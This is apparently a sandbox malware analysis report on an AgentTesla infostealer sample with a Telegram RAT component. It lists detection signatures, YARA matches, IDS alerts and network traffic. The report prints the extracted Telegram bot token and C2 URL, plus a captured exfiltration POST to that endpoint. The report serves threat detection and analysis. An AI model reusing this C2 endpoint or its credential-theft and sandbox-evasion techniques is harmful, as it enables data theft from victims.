Edit tour

Windows Analysis Report
rzN2ckYW24.exe

Overview

General Information

Sample Name:	rzN2ckYW24.exe
Analysis ID:	736948
MD5:	44159444c9bc9980871b80b3ae071ffb
SHA1:	baf57ff497d2e202a1a119e8719e44c0aa100475
SHA256:	9e4f0e0a10a778fb94e7631c17082b44bf75170d7ca81b393574fd3f4c004f47
Tags:	AgentTeslaexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Yara detected AntiVM3

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

rzN2ckYW24.exe (PID: 3044 cmdline: C:\Users\user\Desktop\rzN2ckYW24.exe MD5: 44159444C9BC9980871B80B3AE071FFB)

rzN2ckYW24.exe (PID: 6132 cmdline: C:\Users\user\Desktop\rzN2ckYW24.exe MD5: 44159444C9BC9980871B80B3AE071FFB)

rzN2ckYW24.exe (PID: 6128 cmdline: C:\Users\user\Desktop\rzN2ckYW24.exe MD5: 44159444C9BC9980871B80B3AE071FFB)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31d21:$a13: get_DnsResolver 0x30402:$a20: get_LastAccessed 0x3274f:$a27: set_InternalServerPort 0x32a84:$a30: set_GuidMasterKey 0x30514:$a33: get_Clipboard 0x30522:$a34: get_Keyboard 0x3191b:$a35: get_ShiftKeyDown 0x3192c:$a36: get_AltKeyDown 0x3052f:$a37: get_Password 0x31062:$a38: get_PasswordHash 0x32183:$a39: get_DefaultCredentials
00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x6c0c9:$a13: get_DnsResolver 0xa28e9:$a13: get_DnsResolver 0xd8f09:$a13: get_DnsResolver 0x6a7aa:$a20: get_LastAccessed 0xa0fca:$a20: get_LastAccessed 0xd75ea:$a20: get_LastAccessed 0x6caf7:$a27: set_InternalServerPort 0xa3317:$a27: set_InternalServerPort 0xd9937:$a27: set_InternalServerPort 0x6ce2c:$a30: set_GuidMasterKey 0xa364c:$a30: set_GuidMasterKey 0xd9c6c:$a30: set_GuidMasterKey 0x6a8bc:$a33: get_Clipboard 0xa10dc:$a33: get_Clipboard 0xd76fc:$a33: get_Clipboard 0x6a8ca:$a34: get_Keyboard 0xa10ea:$a34: get_Keyboard 0xd770a:$a34: get_Keyboard 0x6bcc3:$a35: get_ShiftKeyDown 0xa24e3:$a35: get_ShiftKeyDown 0xd8b03:$a35: get_ShiftKeyDown
Process Memory Space: rzN2ckYW24.exe PID: 3044	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: rzN2ckYW24.exe PID: 3044	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: rzN2ckYW24.exe PID: 3044	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0xeccc1:$a13: get_DnsResolver 0xeb602:$a20: get_LastAccessed 0xed69e:$a27: set_InternalServerPort 0xed905:$a30: set_GuidMasterKey 0xeb6fd:$a33: get_Clipboard 0xeb70b:$a34: get_Keyboard 0xec957:$a35: get_ShiftKeyDown 0xec968:$a36: get_AltKeyDown 0xeb718:$a37: get_Password 0xec1a7:$a38: get_PasswordHash 0xed0f7:$a39: get_DefaultCredentials
Process Memory Space: rzN2ckYW24.exe PID: 6128	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: rzN2ckYW24.exe PID: 6128	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: rzN2ckYW24.exe PID: 6128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rzN2ckYW24.exe PID: 6128	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x33980:$a13: get_DnsResolver 0x322c1:$a20: get_LastAccessed 0x3435d:$a27: set_InternalServerPort 0x345c4:$a30: set_GuidMasterKey 0x323bc:$a33: get_Clipboard 0x323ca:$a34: get_Keyboard 0x33616:$a35: get_ShiftKeyDown 0x33627:$a36: get_AltKeyDown 0x323d7:$a37: get_Password 0x32e66:$a38: get_PasswordHash 0x33db6:$a39: get_DefaultCredentials
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.rzN2ckYW24.exe.3dd31a8.13.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3dd31a8.13.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3dd31a8.13.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5f:$s10: logins 0x326d9:$s11: credential 0x2e914:$g1: get_Clipboard 0x2e922:$g2: get_Keyboard 0x2e92f:$g3: get_Password 0x2fd0b:$g4: get_CtrlKeyDown 0x2fd1b:$g5: get_ShiftKeyDown 0x2fd2c:$g6: get_AltKeyDown
0.2.rzN2ckYW24.exe.3dd31a8.13.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x30121:$a13: get_DnsResolver 0x2e802:$a20: get_LastAccessed 0x30b4f:$a27: set_InternalServerPort 0x30e84:$a30: set_GuidMasterKey 0x2e914:$a33: get_Clipboard 0x2e922:$a34: get_Keyboard 0x2fd1b:$a35: get_ShiftKeyDown 0x2fd2c:$a36: get_AltKeyDown 0x2e92f:$a37: get_Password 0x2f462:$a38: get_PasswordHash 0x30583:$a39: get_DefaultCredentials
2.0.rzN2ckYW24.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.rzN2ckYW24.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.rzN2ckYW24.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x34a5f:$s10: logins 0x344d9:$s11: credential 0x30714:$g1: get_Clipboard 0x30722:$g2: get_Keyboard 0x3072f:$g3: get_Password 0x31b0b:$g4: get_CtrlKeyDown 0x31b1b:$g5: get_ShiftKeyDown 0x31b2c:$g6: get_AltKeyDown
2.0.rzN2ckYW24.exe.400000.0.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31f21:$a13: get_DnsResolver 0x30602:$a20: get_LastAccessed 0x3294f:$a27: set_InternalServerPort 0x32c84:$a30: set_GuidMasterKey 0x30714:$a33: get_Clipboard 0x30722:$a34: get_Keyboard 0x31b1b:$a35: get_ShiftKeyDown 0x31b2c:$a36: get_AltKeyDown 0x3072f:$a37: get_Password 0x31262:$a38: get_PasswordHash 0x32383:$a39: get_DefaultCredentials
0.2.rzN2ckYW24.exe.2cd4898.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.rzN2ckYW24.exe.2cd4898.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x35512:$v1: SbieDll.dll 0x3552c:$v2: USER 0x35538:$v3: SANDBOX 0x3554a:$v4: VIRUS 0x3559a:$v4: VIRUS 0x35558:$v5: MALWARE 0x3556a:$v6: SCHMIDTI 0x3557e:$v7: CURRENTUSER
0.2.rzN2ckYW24.exe.2cf7984.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.rzN2ckYW24.exe.2cf7984.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x12426:$v1: SbieDll.dll 0x12440:$v2: USER 0x1244c:$v3: SANDBOX 0x1245e:$v4: VIRUS 0x124ae:$v4: VIRUS 0x1246c:$v5: MALWARE 0x1247e:$v6: SCHMIDTI 0x12492:$v7: CURRENTUSER
0.2.rzN2ckYW24.exe.3e099c8.12.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3e099c8.12.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3e099c8.12.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5f:$s10: logins 0x326d9:$s11: credential 0x2e914:$g1: get_Clipboard 0x2e922:$g2: get_Keyboard 0x2e92f:$g3: get_Password 0x2fd0b:$g4: get_CtrlKeyDown 0x2fd1b:$g5: get_ShiftKeyDown 0x2fd2c:$g6: get_AltKeyDown
0.2.rzN2ckYW24.exe.3e099c8.12.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x30121:$a13: get_DnsResolver 0x2e802:$a20: get_LastAccessed 0x30b4f:$a27: set_InternalServerPort 0x30e84:$a30: set_GuidMasterKey 0x2e914:$a33: get_Clipboard 0x2e922:$a34: get_Keyboard 0x2fd1b:$a35: get_ShiftKeyDown 0x2fd2c:$a36: get_AltKeyDown 0x2e92f:$a37: get_Password 0x2f462:$a38: get_PasswordHash 0x30583:$a39: get_DefaultCredentials
0.2.rzN2ckYW24.exe.2d587f0.8.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.rzN2ckYW24.exe.2d587f0.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x1ec3ba:$v1: SbieDll.dll 0x1ec3d4:$v2: USER 0x1ec3e0:$v3: SANDBOX 0x1ec3f2:$v4: VIRUS 0x1ec442:$v4: VIRUS 0x1ec400:$v5: MALWARE 0x1ec412:$v6: SCHMIDTI 0x1ec426:$v7: CURRENTUSER
0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x6ea7f:$s10: logins 0xa529f:$s10: logins 0xdb8bf:$s10: logins 0x6e4f9:$s11: credential 0xa4d19:$s11: credential 0xdb339:$s11: credential 0x6a734:$g1: get_Clipboard 0xa0f54:$g1: get_Clipboard 0xd7574:$g1: get_Clipboard 0x6a742:$g2: get_Keyboard 0xa0f62:$g2: get_Keyboard 0xd7582:$g2: get_Keyboard 0x6a74f:$g3: get_Password 0xa0f6f:$g3: get_Password 0xd758f:$g3: get_Password 0x6bb2b:$g4: get_CtrlKeyDown 0xa234b:$g4: get_CtrlKeyDown 0xd896b:$g4: get_CtrlKeyDown 0x6bb3b:$g5: get_ShiftKeyDown 0xa235b:$g5: get_ShiftKeyDown 0xd897b:$g5: get_ShiftKeyDown
0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x105f4f:$s1: file:/// 0x17656f:$s1: file:/// 0x105e5f:$s2: {11111-22222-10009-11112} 0x17647f:$s2: {11111-22222-10009-11112} 0x105edf:$s3: {11111-22222-50001-00000} 0x1764ff:$s3: {11111-22222-50001-00000} 0x10502d:$s4: get_Module 0x17564d:$s4: get_Module 0x6ace5:$s5: Reverse 0xa1505:$s5: Reverse 0xd7b25:$s5: Reverse 0x1053a8:$s5: Reverse 0x1759c8:$s5: Reverse 0x6cd57:$s6: BlockCopy 0xa3577:$s6: BlockCopy 0xd9b97:$s6: BlockCopy 0x100423:$s6: BlockCopy 0x170a43:$s6: BlockCopy 0x6afa3:$s7: ReadByte 0xa17c3:$s7: ReadByte 0xd7de3:$s7: ReadByte
0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x6bf41:$a13: get_DnsResolver 0xa2761:$a13: get_DnsResolver 0xd8d81:$a13: get_DnsResolver 0x6a622:$a20: get_LastAccessed 0xa0e42:$a20: get_LastAccessed 0xd7462:$a20: get_LastAccessed 0x6c96f:$a27: set_InternalServerPort 0xa318f:$a27: set_InternalServerPort 0xd97af:$a27: set_InternalServerPort 0x6cca4:$a30: set_GuidMasterKey 0xa34c4:$a30: set_GuidMasterKey 0xd9ae4:$a30: set_GuidMasterKey 0x6a734:$a33: get_Clipboard 0xa0f54:$a33: get_Clipboard 0xd7574:$a33: get_Clipboard 0x6a742:$a34: get_Keyboard 0xa0f62:$a34: get_Keyboard 0xd7582:$a34: get_Keyboard 0x6bb3b:$a35: get_ShiftKeyDown 0xa235b:$a35: get_ShiftKeyDown 0xd897b:$a35: get_ShiftKeyDown
0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x34a5f:$s10: logins 0x6b07f:$s10: logins 0x344d9:$s11: credential 0x6aaf9:$s11: credential 0x30714:$g1: get_Clipboard 0x66d34:$g1: get_Clipboard 0x30722:$g2: get_Keyboard 0x66d42:$g2: get_Keyboard 0x3072f:$g3: get_Password 0x66d4f:$g3: get_Password 0x31b0b:$g4: get_CtrlKeyDown 0x6812b:$g4: get_CtrlKeyDown 0x31b1b:$g5: get_ShiftKeyDown 0x6813b:$g5: get_ShiftKeyDown 0x31b2c:$g6: get_AltKeyDown 0x6814c:$g6: get_AltKeyDown
0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9570f:$s1: file:/// 0x105d2f:$s1: file:/// 0x9561f:$s2: {11111-22222-10009-11112} 0x105c3f:$s2: {11111-22222-10009-11112} 0x9569f:$s3: {11111-22222-50001-00000} 0x105cbf:$s3: {11111-22222-50001-00000} 0x947ed:$s4: get_Module 0x104e0d:$s4: get_Module 0x30cc5:$s5: Reverse 0x672e5:$s5: Reverse 0x94b68:$s5: Reverse 0x105188:$s5: Reverse 0x32d37:$s6: BlockCopy 0x69357:$s6: BlockCopy 0x8fbe3:$s6: BlockCopy 0x100203:$s6: BlockCopy 0x30f83:$s7: ReadByte 0x675a3:$s7: ReadByte 0x95721:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x105d41:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31f21:$a13: get_DnsResolver 0x68541:$a13: get_DnsResolver 0x30602:$a20: get_LastAccessed 0x66c22:$a20: get_LastAccessed 0x3294f:$a27: set_InternalServerPort 0x68f6f:$a27: set_InternalServerPort 0x32c84:$a30: set_GuidMasterKey 0x692a4:$a30: set_GuidMasterKey 0x30714:$a33: get_Clipboard 0x66d34:$a33: get_Clipboard 0x30722:$a34: get_Keyboard 0x66d42:$a34: get_Keyboard 0x31b1b:$a35: get_ShiftKeyDown 0x6813b:$a35: get_ShiftKeyDown 0x31b2c:$a36: get_AltKeyDown 0x6814c:$a36: get_AltKeyDown 0x3072f:$a37: get_Password 0x66d4f:$a37: get_Password 0x31262:$a38: get_PasswordHash 0x67882:$a38: get_PasswordHash 0x32383:$a39: get_DefaultCredentials
0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x34a5f:$s10: logins 0x6b27f:$s10: logins 0xa189f:$s10: logins 0x344d9:$s11: credential 0x6acf9:$s11: credential 0xa1319:$s11: credential 0x30714:$g1: get_Clipboard 0x66f34:$g1: get_Clipboard 0x9d554:$g1: get_Clipboard 0x30722:$g2: get_Keyboard 0x66f42:$g2: get_Keyboard 0x9d562:$g2: get_Keyboard 0x3072f:$g3: get_Password 0x66f4f:$g3: get_Password 0x9d56f:$g3: get_Password 0x31b0b:$g4: get_CtrlKeyDown 0x6832b:$g4: get_CtrlKeyDown 0x9e94b:$g4: get_CtrlKeyDown 0x31b1b:$g5: get_ShiftKeyDown 0x6833b:$g5: get_ShiftKeyDown 0x9e95b:$g5: get_ShiftKeyDown
0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcbf2f:$s1: file:/// 0x13c54f:$s1: file:/// 0xcbe3f:$s2: {11111-22222-10009-11112} 0x13c45f:$s2: {11111-22222-10009-11112} 0xcbebf:$s3: {11111-22222-50001-00000} 0x13c4df:$s3: {11111-22222-50001-00000} 0xcb00d:$s4: get_Module 0x13b62d:$s4: get_Module 0x30cc5:$s5: Reverse 0x674e5:$s5: Reverse 0x9db05:$s5: Reverse 0xcb388:$s5: Reverse 0x13b9a8:$s5: Reverse 0x32d37:$s6: BlockCopy 0x69557:$s6: BlockCopy 0x9fb77:$s6: BlockCopy 0xc6403:$s6: BlockCopy 0x136a23:$s6: BlockCopy 0x30f83:$s7: ReadByte 0x677a3:$s7: ReadByte 0x9ddc3:$s7: ReadByte
0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31f21:$a13: get_DnsResolver 0x68741:$a13: get_DnsResolver 0x9ed61:$a13: get_DnsResolver 0x30602:$a20: get_LastAccessed 0x66e22:$a20: get_LastAccessed 0x9d442:$a20: get_LastAccessed 0x3294f:$a27: set_InternalServerPort 0x6916f:$a27: set_InternalServerPort 0x9f78f:$a27: set_InternalServerPort 0x32c84:$a30: set_GuidMasterKey 0x694a4:$a30: set_GuidMasterKey 0x9fac4:$a30: set_GuidMasterKey 0x30714:$a33: get_Clipboard 0x66f34:$a33: get_Clipboard 0x9d554:$a33: get_Clipboard 0x30722:$a34: get_Keyboard 0x66f42:$a34: get_Keyboard 0x9d562:$a34: get_Keyboard 0x31b1b:$a35: get_ShiftKeyDown 0x6833b:$a35: get_ShiftKeyDown 0x9e95b:$a35: get_ShiftKeyDown
Click to see the 28 entries

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.3 - Destination IP: 149.154.167.220

Timestamp:	192.168.2.3149.154.167.220497034432851779 11/03/22-12:21:37.839026
SID:	2851779
Source Port:	49703
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: rzN2ckYW24.exe	Virustotal: Detection: 30%			Perma Link
Source: rzN2ckYW24.exe	ReversingLabs: Detection: 31%

Machine Learning detection for sample

Source: rzN2ckYW24.exe

Joe Sandbox ML: detected

Source: 2.0.rzN2ckYW24.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: rzN2ckYW24.exe.6132.1.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/"}
Source: rzN2ckYW24.exe.6128.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendMessage"}

Source: rzN2ckYW24.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49703 version: TLS 1.2

Source: rzN2ckYW24.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49703 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

May check the online IP address of the machine

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	DNS query: name: api.ipify.org

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: POST /bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dabd95f4b3e0e1Host: api.telegram.orgContent-Length: 1063Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 3.220.57.224 3.220.57.224
Source: Joe Sandbox View	IP Address: 3.220.57.224 3.220.57.224

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: rzN2ckYW24.exe, 00000002.00000003.326404699.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000002.00000002.521468359.0000000000C26000.00000004.00000020.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000002.00000003.361780005.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rzN2ckYW24.exe, 00000000.00000003.257245989.0000000005C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://en.w
Source: rzN2ckYW24.exe, 00000000.00000003.256683274.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.256591750.0000000005CA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://en.wikipedia
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rzN2ckYW24.exe, 00000002.00000002.525344688.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wmwpuO0P35oL9Q.com
Source: rzN2ckYW24.exe, 00000000.00000003.260307774.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260356342.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
